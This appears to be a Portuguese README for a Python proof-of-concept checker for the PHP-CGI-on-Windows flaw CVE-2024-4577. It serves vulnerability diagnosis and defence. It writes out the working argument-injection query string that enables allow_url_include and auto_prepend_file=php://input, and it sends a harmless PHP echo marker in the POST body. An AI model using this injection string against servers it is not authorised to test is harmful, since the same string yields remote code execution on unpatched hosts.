
Este script Python é uma ferramenta simples de PoC (Proof of Concept) para diagnosticar a vulnerabilidade recente do PHP CVE-2024-4577.
⚠️ Esta ferramenta é fornecida para fins de diagnóstico de segurança e deve ser usada somente em sistemas de sua propriedade ou em alvos com autorização prévia.
Esta vulnerabilidade é um problema em que, quando o PHP é executado em modo CGI no ambiente Windows, é possível por meio de bypass de caracteres multibyte injetar configurações arbitrárias do PHP e induzir a execução de código.
Este script envia um payload de bypass baseado em query string e código PHP por meio de uma requisição POST para a URL alvo, determinando se há vulnerabilidade.
python3 --version
pip install requests
python3 cve_2024_4577_test.py
Exemplo de entrada:
http://192.168.0.10/index.php
Ou basta inserir apenas o caminho raiz, que é processado automaticamente
http://192.168.0.10
✅ [✅] Vulnerável: o servidor executou o código PHP.
→ O servidor está vulnerável.
✔️ [✔️] Não vulnerável ou bloqueado
→ A resposta foi recebida, mas a vulnerabilidade não foi acionada.
❌ [❌] Falha na requisição: ...
→ O teste falhou devido a erro de conexão, timeout etc.
Inserção da string de bypass da vulnerabilidade:
?%ADd+allow_url_include=1+%ADd+auto_prepend_file=php://input
Inserção de código PHP no corpo do POST:
<?php echo 'CVE-2024-4577-TEST'; ?>
Se o servidor executar esse código, a string correspondente estará contida na resposta, permitindo a verificação.
Este script é fornecido somente para fins educacionais e de pesquisa em segurança; escanear ou testar sistemas sem autorização é ilegal. O usuário assume toda a responsabilidade.
| Nome do arquivo | Descrição |
|---|---|
cve_2024_4577_test.py | Script Python para teste de vulnerabilidade |
README.md | Documento de uso e explicação (este arquivo) |
LICENSE.txt |
Envie relatos de bugs ou sugestões por e-mail ou PR.
Este projeto está licenciado sob a Licença MIT - consulte o arquivo LICENSE para obter detalhes. Copyright (c) 2025 KimJuhyeong95